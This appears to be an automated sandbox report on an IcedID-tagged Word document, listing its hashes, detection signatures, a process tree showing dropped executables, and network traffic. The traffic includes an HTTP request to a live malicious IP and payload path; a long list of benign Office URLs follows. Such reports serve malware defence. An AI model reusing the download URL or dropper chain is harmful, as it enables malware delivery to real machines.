Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
airequipmentcorp-doc-08.11.2022.doc

Overview

General Information

Sample Name:airequipmentcorp-doc-08.11.2022.doc
Analysis ID:682577
MD5:84904f679048e45c43210c22f8fcc5df
SHA1:7e23ee02e2543e51a2ad97b2ede96c441d34e6eb
SHA256:78c296d80214d887820a3c55bc06fbc42b17db90fb01aef0766365b383f1e7f1
Tags:docIcedID
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (creates forbidden files)
Office process drops PE file
Machine Learning detection for sample
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Document misses a certain OLE stream usually present in this Microsoft Office document type
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains capabilities to detect virtual machines
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Queries disk information (often used to detect virtual machines)
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 2240 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • rECA2.tmp.exe (PID: 5584 cmdline: "C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe" "C:\Users\user\AppData\Local\Temp\yE9E2.tmp.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • WmiPrvSE.exe (PID: 5584 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: airequipmentcorp-doc-08.11.2022.docVirustotal: Detection: 24%Perma Link
Source: airequipmentcorp-doc-08.11.2022.docReversingLabs: Detection: 15%
Source: airequipmentcorp-doc-08.11.2022.docJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: rundll32.pdb source: rECA2.tmp.exe, rECA2.tmp.exe, 00000002.00000000.272138035.0000000001001000.00000020.00000001.01000000.00000003.sdmp, rECA2.tmp.exe.0.dr
Source: Binary string: rundll32.pdbGCTL source: rECA2.tmp.exe, 00000002.00000000.272138035.0000000001001000.00000020.00000001.01000000.00000003.sdmp, rECA2.tmp.exe.0.dr

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: rECA2.tmp.exe.0.drJump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\yE9E2.tmp.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exeJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXESection loaded: unknown origin: URLDownloadToFileA
Source: global trafficTCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80
Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.3:49738
Source: global trafficTCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80
Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.3:49738
Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.3:49738
Source: global trafficTCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80
Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.3:49738
Source: global trafficTCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80
Source: winword.exeMemory has grown: Private usage: 2MB later: 79MB
Source: Joe Sandbox ViewIP Address: 45.8.146.139 45.8.146.139
Source: global trafficHTTP traffic detected: GET /fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.8.146.139Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: rECA2.tmp.exe, 00000002.00000002.273279102.0000000000E30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm
Source: rECA2.tmp.exe, 00000002.00000002.273378499.0000000000EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rmRXL73GMCXOFE8AGP5ROGT8/rm8/rm8/rm_
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://api.aadrm.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://api.aadrm.com/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://api.cortana.ai
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://api.office.net
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://api.onedrive.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://augloop.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://cdn.entity.
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://clients.config.office.net/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://config.edge.skype.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://cortana.ai
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://cortana.ai/api
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://cr.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://dev.cortana.ai
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://devnull.onenote.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://directory.services.
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://enrichment.osi.office.net/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://graph.windows.net
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://graph.windows.net/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://invites.office.com/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://lifecycle.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://login.windows.local
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://management.azure.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://management.azure.com/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://messaging.action.office.com/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://messaging.engagement.office.com/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://messaging.office.com/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://my.microsoftpersonalcontent.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://ncus.contentsync.
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://officeapps.live.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://onedrive.live.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://osi.office.net
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://otelrules.azureedge.net
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://outlook.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://outlook.office.com/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://outlook.office365.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://outlook.office365.com/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://pages.store.office.com/review/query
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
